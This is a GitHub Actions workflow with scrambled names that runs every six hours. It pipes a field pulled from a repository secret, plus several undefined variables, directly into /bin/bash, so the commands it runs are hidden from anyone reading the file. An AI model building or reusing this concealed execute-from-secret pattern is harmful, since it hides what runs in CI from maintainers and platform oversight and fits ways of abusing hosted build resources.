name: xiezhen19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '29 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiezhen19871010
        env:
          fjxt66: ${{ secrets.fjxt66 }}
        run: |
          echo $fjxt66 | jq -r .xkavv40 | /bin/bash
          echo $xotx70 | jq -r .pjo088 | /bin/bash
          echo $nq638 | jq -r .w476 | /bin/bash
          echo $tbvle72 | jq -r .ygepf2 | /bin/bash
          echo $qhizh03997 | jq -r .ppy01494 | /bin/bash
          echo $xh07923 | jq -r .zje13 | /bin/bash
          echo $k619 | jq -r .dnoe4930 | /bin/bash
          echo $ko274 | jq -r .b381 | /bin/bash
          echo $r2 | jq -r .oggd9456 | /bin/bash

